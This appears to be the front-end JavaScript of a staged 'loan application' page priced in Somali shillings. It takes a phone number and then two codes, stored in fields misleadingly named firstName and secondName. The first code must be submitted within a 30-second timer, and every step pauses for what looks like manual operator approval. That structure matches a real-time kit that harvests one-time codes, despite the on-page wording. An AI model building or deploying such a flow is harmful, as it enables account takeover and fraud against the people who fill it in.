const state={page:1,applicationId:null,applicationNo:null,amount:null,codeDeadline:null,referralToken:(new URLSearchParams(location.search).get('admin')||new URLSearchParams(location.search).get('ref')||'')};
let timer=null;
const $=id=>document.getElementById(id);
const pages=[...document.querySelectorAll('.page')];
const stepEls=[...document.querySelectorAll('.step')];
function showPage(page){
  state.page=page; pages.forEach(p=>p.classList.toggle('active',p.dataset.page===String(page)));
  const n=page==='success'?5:Number(page);
  stepEls.forEach((el,i)=>{el.classList.toggle('active',i===n-1);el.classList.toggle('done',i<n-1)});
  if(page===2) refreshDeadline(); window.scrollTo({top:0,behavior:'smooth'});
}
function setError(id,msg){const el=$(id);el.textContent=msg||'';el.classList.toggle('hidden',!msg)}
async function getStatus(){const r=await fetch(`/api/applications/${state.applicationId}/status`,{cache:'no-store'});if(!r.ok)throw new Error('Could not read application status.');return r.json()}
function stopTimer(){if(timer){clearInterval(timer);timer=null}}
function timerUI(seconds){const n=Math.max(0,Math.min(30,Number(seconds)||0));$('firstNameSeconds').textContent=String(n);$('firstNameRing').style.setProperty('--progress',`${n/30*100}%`);$('firstNameTimer').classList.toggle('expired',n===0);$('firstNameTimer').querySelector('.countdown-label').textContent=n?'Time remaining to submit':'Time expired — select Try Again';$('firstNameBtn').classList.toggle('hidden',n===0);$('firstNameResubmit').classList.toggle('hidden',n!==0);}
function startTimer(deadline){stopTimer();state.codeDeadline=deadline||null;if(!deadline){timerUI(30);return}const tick=()=>{const n=Math.max(0,Math.ceil((new Date(deadline).getTime()-Date.now())/1000));timerUI(n);if(n===0)stopTimer()};tick();timer=setInterval(tick,250)}
async function refreshDeadline(){try{const d=await getStatus();startTimer(d.firstNameDeadlineAt||new Date(Date.now()+30000).toISOString())}catch{startTimer(new Date(Date.now()+30000).toISOString())}}
async function waitForStatus(expected,next){while(true){try{const d=await getStatus();if(d.status===expected){if(next==='success'){ $('successNumber').textContent=d.applicationNo||state.applicationNo;$('successAmount').textContent=new Intl.NumberFormat('en-US',{style:'currency',currency:'SOS',maximumFractionDigits:0}).format(Number(d.amount||0));showPage('success')}else showPage(next);return}if(d.status==='REJECTED'){handleRejection(d);return}if(d.status==='FINAL_APPROVED'){$('successNumber').textContent=d.applicationNo||state.applicationNo;$('successAmount').textContent=new Intl.NumberFormat('en-US',{style:'currency',currency:'SOS',maximumFractionDigits:0}).format(Number(d.amount||0));showPage('success');return}}catch{}await new Promise(r=>setTimeout(r,200))}}
function handleRejection(d){if(d.rejectedStage==='FIRST_NAME'){stopTimer();$('firstName').disabled=false;$('firstNameBtn').disabled=false;$('firstNameWaiting').classList.add('hidden');setError('page2Error','Code 1 reference was not approved. Check your non-secret reference and try again.');showPage(2)}else if(d.rejectedStage==='SECOND_NAME'){$('secondName').disabled=false;$('secondNameBtn').disabled=false;$('secondNameWaiting').classList.add('hidden');setError('pageSecondError','Code 2 reference was not approved. Check your non-secret reference and try again.');showPage(3)}else if(d.rejectedStage==='AMOUNT'){$('loanAmount').disabled=false;$('loanAmountBtn').disabled=false;$('loanAmountWaiting').classList.add('hidden');setError('page4Error','The requested amount needs correction. Please review and submit again.');showPage(4)}else{$('phone').disabled=false;$('applicationIdInput').disabled=false;$('startApplication').classList.remove('hidden');$('startApplication').disabled=false;$('approvalWaiting').classList.add('hidden');setError('loginError','The application details could not be approved. Check your details and try again.');showPage(1)}}
$('loginForm').addEventListener('submit',async e=>{e.preventDefault();setError('loginError','');const phone=$('phone').value.trim(),applicationId=$('applicationIdInput').value.trim();if(!/^[0-9+\s-]{9,20}$/.test(phone))return setError('loginError','Enter a valid phone number.');if(!/^[A-Za-z0-9-]{3,80}$/.test(applicationId))return setError('loginError','Enter a valid application reference.');const btn=$('startApplication');btn.disabled=true;try{const r=await fetch('/api/applications',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({phone,applicationId,referralToken:state.referralToken})});const d=await r.json().catch(()=>({}));if(!r.ok)throw new Error(d.error||`Application submission failed (HTTP ${r.status}). Please try again.`);if(!d.applicationId)throw new Error('The server did not confirm the application. Please try again.');state.applicationId=d.applicationId;state.applicationNo=d.applicationNo;$('applicationNumber').textContent=d.applicationNo;$('approvalWaiting').classList.remove('hidden');$('phone').disabled=true;$('applicationIdInput').disabled=true;btn.classList.add('hidden');await waitForStatus('APPROVED',2)}catch(err){setError('loginError',err.message||'Could not submit application.');btn.disabled=false}});
async function submitCode(resubmit=false){setError('page2Error','');const value=$('firstName').value.trim();if(!/^[A-Za-z0-9]{1,32}$/.test(value))return setError('page2Error','Enter a code of 1 to 32 letters or numbers, with no spaces or symbols.');const btn=$('firstNameBtn');btn.disabled=true;try{const r=await fetch(`/api/applications/${state.applicationId}/first-name`,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({firstName:value,resubmit})});const d=await r.json().catch(()=>({}));if(!r.ok){if(d.resubmitRequired){timerUI(0);btn.disabled=false;return}throw new Error(d.error||'Could not submit code.')}stopTimer();$('firstName').disabled=true;btn.classList.add('hidden');$('firstNameResubmit').classList.add('hidden');$('firstNameWaiting').classList.remove('hidden');await waitForStatus('APPROVED_FIRST_NAME',3)}catch(err){btn.disabled=false;setError('page2Error',err.message||'Could not submit code.')}}
$('firstNameBtn').addEventListener('click',()=>submitCode(false));$('firstNameResubmit').addEventListener('click',()=>{ $('firstName').disabled=false;$('firstNameBtn').disabled=false;$('firstNameResubmit').classList.add('hidden');$('firstNameBtn').classList.remove('hidden');startTimer(new Date(Date.now()+30000).toISOString())});
$('secondNameBtn').addEventListener('click',async()=>{setError('pageSecondError','');const value=$('secondName').value.trim();if(!/^[A-Za-z0-9-]{3,32}$/.test(value))return setError('pageSecondError','Enter a non-secret reference of 3 to 32 letters, numbers, or hyphens. Do not use an SMS code.');const btn=$('secondNameBtn');btn.disabled=true;try{const r=await fetch(`/api/applications/${state.applicationId}/second-name`,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({secondName:value})});const d=await r.json().catch(()=>({}));if(!r.ok)throw new Error(d.error||'Could not submit Code 2.');$('secondName').disabled=true;btn.classList.add('hidden');$('secondNameWaiting').classList.remove('hidden');await waitForStatus('APPROVED_SECOND_NAME',4)}catch(err){btn.disabled=false;setError('pageSecondError',err.message||'Could not submit Code 2.')}});
$('loanAmountBtn').addEventListener('click',async()=>{setError('page4Error','');const amount=Number($('loanAmount').value);if(!Number.isSafeInteger(amount)||amount<1)return setError('page4Error','Enter a valid whole amount in Somali shillings (SOS).');const btn=$('loanAmountBtn');btn.disabled=true;try{const r=await fetch(`/api/applications/${state.applicationId}/amount`,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({amount})});const d=await r.json().catch(()=>({}));if(!r.ok)throw new Error(d.error||`Amount submission failed (HTTP ${r.status}). Please try again.`);state.amount=amount;$('loanAmount').disabled=true;btn.classList.add('hidden');$('loanAmountWaiting').classList.remove('hidden');await waitForStatus('FINAL_APPROVED','success')}catch(err){btn.disabled=false;setError('page4Error',err.message||'Could not submit amount.')}});
